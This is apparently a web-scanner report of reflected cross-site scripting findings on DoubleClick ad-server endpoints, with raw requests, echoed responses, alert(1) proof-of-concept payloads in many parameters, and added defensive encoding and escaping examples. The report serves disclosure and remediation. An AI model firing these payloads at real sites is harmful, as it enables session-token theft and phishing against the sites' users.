Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
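The two layers above, worked through on the kind of parameters this report reflects. This is an added example, not code from the scanner report or from the ad server; the template shape, the assumption that sz carries only an ad size such as 300x250, and all function names are mine.

```javascript
// Added example, not from the scanner report: the two defensive layers from
// the remediation text, applied to parameters of the kind reflected above.
// Function names, the size format and the template are assumptions.

// Layer 1: validate on arrival against an allow-list, reject on failure.
// Assumption: sz carries an ad size such as "300x250" and nothing else.
const SIZE_RE = /^\d{1,4}x\d{1,4}$/;
function validateSize(sz) {
  if (typeof sz !== 'string' || !SIZE_RE.test(sz)) {
    throw new Error('invalid sz parameter: ' + JSON.stringify(sz));
  }
  return sz;
}

// Layer 2: HTML-encode at the point of output. Every metacharacter named in
// the remediation text becomes an entity, so the value can neither close the
// attribute it sits in nor open a new tag. '&' is in the set so a value that
// already looks like an entity is not re-interpreted as one.
const HTML_ENTITIES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;',
  '"': '&quot;', "'": '&#x27;', '=': '&#x3D;',
};
function htmlEncode(value) {
  return String(value).replace(/[&<>"'=]/g, (c) => HTML_ENTITIES[c]);
}

// A template in the shape the first finding describes: the click parameter
// is copied into a double-quoted attribute value.
function renderClickVulnerable(click) {
  return '<a href="' + click + '">Click here to find out more!</a>';
}
function renderClickHardened(click) {
  return '<a href="' + htmlEncode(click) + '">Click here to find out more!</a>';
}

// Two checks on the rendered markup: where the href attribute actually ends
// (at the first raw double quote) and how many <script elements exist.
function hrefValue(html) {
  const start = html.indexOf('href="') + 'href="'.length;
  return html.slice(start, html.indexOf('"', start));
}
function countScriptTags(html) {
  return (html.match(/<script/gi) || []).length;
}

// The click payload recorded in the report.
const CLICK_PAYLOAD = 'b8baf"><script>alert(1)</script>75e5e999f56';

// Vulnerable: href ends at "b8baf" and a <script> element follows.
// Hardened: the whole payload stays inside the attribute as inert text.
function demo() {
  return {
    vulnerableHref: hrefValue(renderClickVulnerable(CLICK_PAYLOAD)),
    vulnerableScripts: countScriptTags(renderClickVulnerable(CLICK_PAYLOAD)),
    hardenedHref: hrefValue(renderClickHardened(CLICK_PAYLOAD)),
    hardenedScripts: countScriptTags(renderClickHardened(CLICK_PAYLOAD)),
  };
}
```

Validation alone is not enough for the URL-valued parameters here (click, redirectURL, redirect): a URL legitimately contains ?, & and =, so its alphabet cannot be narrowed much, and the output-encoding layer is the one that has to hold. Note too that encoding is context-specific: the entities produced by htmlEncode protect an attribute or element body, not a JavaScript string literal, which the later findings land in.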
The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8baf"><script>alert(1)</script>75e5e999f56 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the key request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bdac"-alert(1)-"77392b856f was submitted in the key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
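Where the data must be placed in a script after all, the escaping has to be JavaScript escaping, not HTML-entity encoding. The following is an added example, not code from the scanner report or from the ad server: it models the template shape every remaining finding in this report describes (a request parameter copied into a double-quoted JavaScript string; the same applies where the parameter name rather than its value is reflected), beside a hardened version. The hostname example.invalid, the template and all function names are assumptions.

```javascript
// Added example, not from the scanner report or the ad server's code: a
// template that copies a request parameter into a JavaScript string literal,
// beside a hardened version. Hostname, template and names are assumptions.

// Vulnerable: the value lands between double quotes unchanged.
function renderScriptVulnerable(key) {
  return '<script>var url = "http://example.invalid/pixel?key=' + key + '";</script>';
}

// Hardened: JavaScript-escape the value so no character can terminate the
// literal. JSON.stringify backslash-escapes the quote and the backslash; '<'
// is additionally written as \u003c so the literal can never contain the
// sequence "</script>", which the HTML parser honours before JavaScript ever
// sees the text; U+2028/U+2029 are escaped for older engines that treat them
// as line terminators inside a literal.
function jsStringEscape(value) {
  return JSON.stringify(String(value))
    .slice(1, -1)
    .replace(/</g, '\\u003c')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}
function renderScriptHardened(key) {
  return '<script>var url = "http://example.invalid/pixel?key=' + jsStringEscape(key) + '";</script>';
}

// Execute the inline script body the way a browser would, with alert
// replaced by a spy, and report what url ended up holding.
function runScriptBody(html) {
  const open = '<script>';
  const body = html.slice(html.indexOf(open) + open.length, html.lastIndexOf('</script>'));
  const alertCalls = [];
  const url = new Function('alert', body + '\nreturn url;')((x) => { alertCalls.push(x); });
  return { url, alertCalls };
}
function countOccurrences(haystack, needle) {
  return haystack.split(needle).length - 1;
}

// Payloads: the one recorded for the key parameter, and one (constructed for
// this example) that closes the script element instead of the string.
const KEY_PAYLOAD = 'Click6bdac"-alert(1)-"77392b856f';
const SCRIPT_CLOSE_PAYLOAD = '</script><script>alert(2)</script>';

// Vulnerable: "...Click6bdac" - alert(1) - "77392b856f" runs alert and leaves
// url as NaN. Hardened: alert is never called and url holds the full value.
function demo() {
  return {
    vulnerable: runScriptBody(renderScriptVulnerable(KEY_PAYLOAD)),
    hardened: runScriptBody(renderScriptHardened(KEY_PAYLOAD)),
    vulnerableScriptClosers: countOccurrences(renderScriptVulnerable(SCRIPT_CLOSE_PAYLOAD), '</script>'),
    hardenedScriptClosers: countOccurrences(renderScriptHardened(SCRIPT_CLOSE_PAYLOAD), '</script>'),
  };
}
```

The payload shape the scanner used, "-alert(1)-", is chosen so that the statement still parses after injection: the string is closed, alert(1) becomes an operand of a subtraction, and the trailing quote reopens a string to absorb the rest of the literal. Backslash-escaping the quote removes the only way out of the literal, and the \u003c rewrite removes the only way out of the script element.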
Request
GET /adi/N6344.150290.INVITE.COM/B5445429.7;sz=300x250;click=http://va.px.invitemedia.com/pixel?returnType=redirect&key=Click6bdac"-alert(1)-"77392b856f&message=eJwtjDkOgEAMA7.CUlPkzi5vWtFRIf6Og6jGIzu5yYyOTTjMY9_IFJausyZMIKQRHMOnuAA1Uop62V2F8md9pmD8dPC81kLM_p_KYs8LgAYVNw--&redirectURL=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LvQ0CMQwG0O_4U9CtQWsUx3ESF6xASZ9cTH0bMgbrIPH6t2IBcBszVdfNScwKZRalkVzJOb6t82wbx4DD83p_rTj-R-5jeBESb5XqVKPJxallmZzUJDYPOAH1EXDG8u0BF2D_4Afd2YvCcwAAAA%3D%3D%26dst%3D;ord=1309224534? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7397
Date: Tue, 28 Jun 2011 01:29:37 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... .doubleclick.net/click%3Bh%3Dv8/3b34/f/1bc/%2a/t%3B240188907%3B0-0%3B0%3B63005625%3B4307-300/250%3B41751683/41769470/2%3B%3B%7Esscs%3D%3fhttp://va.px.invitemedia.com/pixel?returnType=redirect&key=Click6bdac"-alert(1)-"77392b856f&message=eJwtjDkOgEAMA7.CUlPkzi5vWtFRIf6Og6jGIzu5yYyOTTjMY9_IFJausyZMIKQRHMOnuAA1Uop62V2F8md9pmD8dPC81kLM_p_KYs8LgAYVNw--&redirectURL=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LvQ0CMQwG0 ...[SNIP]...
The value of the message request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae2e9"-alert(1)-"dc78b75f8dd was submitted in the message parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N6344.150290.INVITE.COM/B5445429.7;sz=300x250;click=http://va.px.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwtjDkOgEAMA7.CUlPkzi5vWtFRIf6Og6jGIzu5yYyOTTjMY9_IFJausyZMIKQRHMOnuAA1Uop62V2F8md9pmD8dPC81kLM_p_KYs8LgAYVNw--ae2e9"-alert(1)-"dc78b75f8dd&redirectURL=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LvQ0CMQwG0O_4U9CtQWsUx3ESF6xASZ9cTH0bMgbrIPH6t2IBcBszVdfNScwKZRalkVzJOb6t82wbx4DD83p_rTj-R-5jeBESb5XqVKPJxallmZzUJDYPOAH1EXDG8u0BF2D_4Afd2YvCcwAAAA%3D%3D%26dst%3D;ord=1309224534? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7401
Date: Tue, 28 Jun 2011 01:29:48 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... %3B%7Esscs%3D%3fhttp://va.px.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwtjDkOgEAMA7.CUlPkzi5vWtFRIf6Og6jGIzu5yYyOTTjMY9_IFJausyZMIKQRHMOnuAA1Uop62V2F8md9pmD8dPC81kLM_p_KYs8LgAYVNw--ae2e9"-alert(1)-"dc78b75f8dd&redirectURL=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LvQ0CMQwG0O_4U9CtQWsUx3ESF6xASZ9cTH0bMgbrIPH6t2IBcBszVdfNScwKZRalkVzJOb6t82wbx4DD83p_rTj-R-5jeBESb5XqVKPJxallmZzUJDYPOAH1EXDG8u0BF2 ...[SNIP]...
The value of the redirectURL request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5275"-alert(1)-"ac334d801d8 was submitted in the redirectURL parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N6344.150290.INVITE.COM/B5445429.7;sz=300x250;click=http://va.px.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwtjDkOgEAMA7.CUlPkzi5vWtFRIf6Og6jGIzu5yYyOTTjMY9_IFJausyZMIKQRHMOnuAA1Uop62V2F8md9pmD8dPC81kLM_p_KYs8LgAYVNw--&redirectURL=b5275"-alert(1)-"ac334d801d8 HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6515
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 01:29:50 GMT
Expires: Tue, 28 Jun 2011 01:29:50 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... %3fhttp://va.px.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwtjDkOgEAMA7.CUlPkzi5vWtFRIf6Og6jGIzu5yYyOTTjMY9_IFJausyZMIKQRHMOnuAA1Uop62V2F8md9pmD8dPC81kLM_p_KYs8LgAYVNw--&redirectURL=b5275"-alert(1)-"ac334d801d8http://disneyland.disney.go.com/vacation-packages/spend-one-more-day/?CMP=BAC-DLRUSENFY11Q3DLRCTI0068"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var d ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17d63"-alert(1)-"0029028972a was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N6344.150290.INVITE.COM/B5445429.7;sz=300x250;click=http://va.px.invitemedia.com/pixel?returnType=redirect17d63"-alert(1)-"0029028972a&key=Click&message=eJwtjDkOgEAMA7.CUlPkzi5vWtFRIf6Og6jGIzu5yYyOTTjMY9_IFJausyZMIKQRHMOnuAA1Uop62V2F8md9pmD8dPC81kLM_p_KYs8LgAYVNw--&redirectURL=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LvQ0CMQwG0O_4U9CtQWsUx3ESF6xASZ9cTH0bMgbrIPH6t2IBcBszVdfNScwKZRalkVzJOb6t82wbx4DD83p_rTj-R-5jeBESb5XqVKPJxallmZzUJDYPOAH1EXDG8u0BF2D_4Afd2YvCcwAAAA%3D%3D%26dst%3D;ord=1309224534? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7425
Date: Tue, 28 Jun 2011 01:29:26 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... ://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b34/f/1bd/%2a/w%3B240188907%3B1-0%3B0%3B63005625%3B4307-300/250%3B42010411/42028198/1%3B%3B%7Esscs%3D%3fhttp://va.px.invitemedia.com/pixel?returnType=redirect17d63"-alert(1)-"0029028972a&key=Click&message=eJwtjDkOgEAMA7.CUlPkzi5vWtFRIf6Og6jGIzu5yYyOTTjMY9_IFJausyZMIKQRHMOnuAA1Uop62V2F8md9pmD8dPC81kLM_p_KYs8LgAYVNw--&redirectURL=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3 ...[SNIP]...
The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 955d3"-alert(1)-"79fca5d6b07 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e83e6"-alert(1)-"517e13c6861 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7636"-alert(1)-"63cd2f45aaf was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edf41"-alert(1)-"547d679179c was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70a14"-alert(1)-"5a45727816e was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c057"-alert(1)-"6f219f1e3a4 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccf69"-alert(1)-"a746c5cd003 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d35fd"-alert(1)-"5de782ce6f7 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 926de"-alert(1)-"6a870769378 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3ef0"-alert(1)-"7fe67c3c10a was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 683c0"-alert(1)-"53404fc0cf5 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6039
Date: Tue, 28 Jun 2011 02:27:53 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 3Bh%3Dv8/3b34/7/ab/%2a/o%3B239209705%3B0-0%3B0%3B62127642%3B4307-300/250%3B41296617/41314404/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=440354583601742042&mt_id=112513&mt_adid=100488683c0"-alert(1)-"53404fc0cf5&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://www.geico.com/landingpage/go111.htm?soa=59797"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; ...[SNIP]...
The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8295b"-alert(1)-"0063854f767 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6039
Date: Tue, 28 Jun 2011 02:27:27 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... lick.net/click%3Bh%3Dv8/3b34/7/ab/%2a/o%3B239209705%3B0-0%3B0%3B62127642%3B4307-300/250%3B41296617/41314404/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=440354583601742042&mt_id=1125138295b"-alert(1)-"0063854f767&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://www.geico.com/landingpage/go111.htm?soa=59797"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; ...[SNIP]...
The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e933c"-alert(1)-"2d7f11bea7 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6035
Date: Tue, 28 Jun 2011 02:28:19 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 0%3B62127642%3B4307-300/250%3B41296617/41314404/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=440354583601742042&mt_id=112513&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530e933c"-alert(1)-"2d7f11bea7&redirect=http://www.geico.com/landingpage/go111.htm?soa=59797"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never"; var op ...[SNIP]...
1.19. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.11 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adi/N6595.317091.MERKLEINC.COM/B5374569.11
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 189ae"-alert(1)-"2f1dc89c1e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6051
Date: Tue, 28 Jun 2011 02:29:04 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 2%3B4307-300/250%3B41296617/41314404/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=440354583601742042&mt_id=112513&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=&189ae"-alert(1)-"2f1dc89c1e3=1http://www.geico.com/landingpage/go111.htm?soa=59797"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c64cb"-alert(1)-"4e5a87e0f7b was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6039
Date: Tue, 28 Jun 2011 02:28:41 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 42%3B4307-300/250%3B41296617/41314404/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=440354583601742042&mt_id=112513&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=c64cb"-alert(1)-"4e5a87e0f7bhttp://www.geico.com/landingpage/go111.htm?soa=59797"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42d18"-alert(1)-"a23769c2b50 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6039
Date: Tue, 28 Jun 2011 02:27:05 GMT
